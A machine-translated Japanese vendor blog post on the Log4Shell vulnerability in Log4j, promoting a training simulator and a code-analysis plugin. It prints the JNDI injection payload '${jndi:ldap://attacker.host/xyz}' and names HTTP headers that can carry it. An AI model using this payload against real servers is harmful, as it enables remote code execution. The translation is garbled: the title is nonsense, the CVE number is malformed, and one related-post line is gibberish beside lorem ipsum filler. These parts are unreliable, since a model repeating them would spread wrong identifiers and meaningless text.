Log4jの近親相-v788とその近く

12月9日、JavaライブラリLog4jのゼロデイエクスプロイトが公開されました。 CVE-4428、吹き替え ログ 4 シェル、このエクスプロイトによりリモートでコードが実行される可能性があるため、「重大度高」という評価を受けました(レース)。さらに、log4j-core は最も一般的な Java ロギングライブラリの 1 つであるため、何百万ものアプリケーションが危険にさらされます。
Log4Shellに取り組むスキルをすばやくレベルアップしたいですか?
Log4Shellの基本的な考え方から、Missionと呼ばれるシミュレーターでこの脆弱性の悪用を体験できるショーケースを構築しました。このミッションでは、Log4j の脆弱性がインフラストラクチャーやアプリケーションにどのように影響するかを順を追って説明します。 ショーケースに直接移動するには、ここをクリックしてくださいまたは、引き続き読み進めて脆弱性の詳細を確認してください。
古いニュース?
このエクスプロイトは新しいものではありません。セキュリティ研究者は 2016 年の BlackHat トークですでに発表しています。 アルバロ・ムニョスとオレクサンドル・ミロシュ それを強調しました。」アプリケーションでは、信頼できないデータを使用して JNDI ルックアップを実行すべきではありません」と、ターゲットを絞ったJNDI/LDAPインジェクションがどのようにリモートコード実行につながるかを説明しました。そして、これこそまさに Log4Shell の中核にあるものです。
攻撃ベクトル
Log4Shell のインジェクションペイロードは次のようになります。
$ {jndi: ldap: //attacker.host/xyz}
これを理解するには、Java の表現言語 (EL) について知る必要があります。次の構文で記述された式: $ {expr} 実行時に評価されます。たとえば、$ {java: version} は使用されている Java バージョンを返します。
次に、JNDI、または Java ネーミングとディレクトリインターフェイスは、LDAP、DNS、RMI などのプロトコルを使用してサービスに接続し、データまたはリソースを取得できるようにする API です。簡単に言うと、前述の悪意のあるペイロードの例では、JNDI は攻撃者が制御する LDAP サーバーを検索します。たとえば、その応答が悪意のあるコードを含む Java クラスファイルを指していて、そのコードが脆弱なサーバー上で実行されてしまう可能性があります。
この脆弱性が大きな問題となっているのは、Log4j がすべてのログエントリを評価し、「jndi」というプレフィックスが付いた EL 構文で記述されたすべてのログユーザー入力を検索するためです。ペイロードは、フォームフィールドなど、ユーザーがデータを入力できる場所ならどこにでも挿入できます。また、次のような HTTP ヘッダーもあります。 ユーザーエージェント そして X-Forwarded-For、およびその他のヘッダーは、ペイロードを伝送するようにカスタマイズできます。
このエクスプロイトを自分で体験するには、 ショーケースに進み、ステップ2「エクスペリエンス・インパクト」に飛び込んでください。
予防:意識
Log4jは脆弱なコードにパッチを当てているため、アップグレードはすべてのアプリケーションに推奨されます。ただし、バージョン 2.15.0 と 2.16.0 には DDoS やその他の脆弱性が含まれていたため、12 月下旬の時点で 2.17.0 へのアップグレードが推奨されています。
コードを書く開発者は、常にセキュリティを考慮する必要があります。Log4Shell は、サードパーティのフレームワークやライブラリを使用するときにはリスクが伴うことを教えてくれました。私たちは、単純に安全だと思い込んでいる外部ソースを使うことで、アプリケーションのセキュリティが危険にさらされる可能性があることを認識しておく必要があります。
この脆弱性を防ぐことはできましたか?はい、いいえ。一方で、開発者ができることは脆弱なコンポーネントがサードパーティのソフトウェアから導入されている場合に限られます。一方、このことから学んだ教訓は何度も繰り返されてきたものです。つまり、ユーザーの入力を決して信用しないということです。
Secure Code Warriorは、セキュリティ志向の開発者がコードの脆弱性を防ぐ最善の方法であると考えています。SCW はプログラミングフレームワークに特化したトレーニングを大規模に提供しているため、企業のお客様は、レポートデータを利用することで、影響を受けた Java 開発者を迅速に特定できるようになりました。また、Log4j のアップグレードを加速させるために、SCW のトレーニングを受けたセキュリティチャンピオンに頼っていました。
特にJava開発者のために、セキュア・コード・ウォリアーは無料のIntelliJプラグインであるSenseiを提供しています。このルールベースのコード分析ツールを使用すると、コーディングガイドラインを適用したり、脆弱性を防いだり修正したりできます。独自のルールを作成することも、既製のルールを使用することもできます。 クックブック。当社を閲覧してください レシピ、そして私たちのダウンロードを忘れないでください Log4j クックブック これにより、Log4Shellの脆弱性を瞬時に見つけて修正できます。
Log4Shell に対する防御のスキルをレベルアップさせましょう
このブログ投稿で学んだことを実践することに興味がありますか?私たちのショーケースが役に立ちます。ショーケースの開始時に、この脆弱性を簡単に確認した後、シミュレートされた環境に移動し、ガイド付きの指示に従ってエクスプロイトを試してみることができます。
Govern AI-driven development before it ships
Measure AI-assisted risk, enforce secure coding policy at commit, and accelerate secure delivery across your SDLC.
Explore more blogs
これは、オーラが射手と鼻の穴を広げることによって、腸管を熱的に発芽させ、臭いを帯びていることを防ぐためのものです。
%252520%252520(3).avif)
Supercharged Security Awareness: How Tournaments are Inspiring Developers at Erste Group
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Suspendisse varius enim in eros elementum tristique. Duis cursus, mi quis viverra ornare, eros dolor interdum nulla, ut commodo diam libero vitae erat. Aenean faucibus nibh et justo cursus id rutrum lorem imperdiet. Nunc ut sem vitae risus tristique posuere.

Security as culture: How Blue Prism cultivates world-class secure developers
Learn how Blue Prism, the global leader in intelligent automation for the enterprise, used Secure Code Warrior's agile learning platform to create a security-first culture with their developers, achieve their business goals, and ship secure code at speed

One Culture of Security: How Sage built their security champions program with agile secure code learning
Discover how Sage enhanced security with a flexible, relationship-focused approach, creating 200+ security champions and achieving measurable risk reduction.
.webp)
Why most CISOs are navigating AI adoption blindfolded (and how they can remove it)
Today, Secure Code Warrior issued an all-new white paper covering a prescriptive, directional AI adoption model that security leaders can use to identify their adoption stage and make real progress in bringing the AI security risks within their organization under control.
Secure AI-driven development before it ships
See developer risk, enforce policy, and prevent vulnerabilities across your software development lifecycle.

